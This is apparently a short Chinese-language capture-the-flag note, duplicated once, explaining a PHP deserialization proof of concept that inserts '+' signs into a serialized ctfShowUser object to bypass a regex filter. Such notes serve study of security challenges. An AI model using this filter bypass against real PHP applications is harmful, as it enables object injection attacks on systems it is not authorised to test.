poc关键点
$a=serialize(new ctfShowUser()); $b=str_replace(':11',':+11',$a); $c=str_replace(':8',':+8',$b);
1、你会问为啥要用:+11替换:11?
我的回答是为了绕过正则。
2、你要问为啥要用+号?
因为+代表正负的正,+11和11是一样的。
哈哈哈,我也是才整明白。
poc关键点
$a=serialize(new ctfShowUser()); $b=str_replace(':11',':+11',$a); $c=str_replace(':8',':+8',$b);
1、你会问为啥要用:+11替换:11?
我的回答是为了绕过正则。
2、你要问为啥要用+号?
因为+代表正负的正,+11和11是一样的。
哈哈哈,我也是才整明白。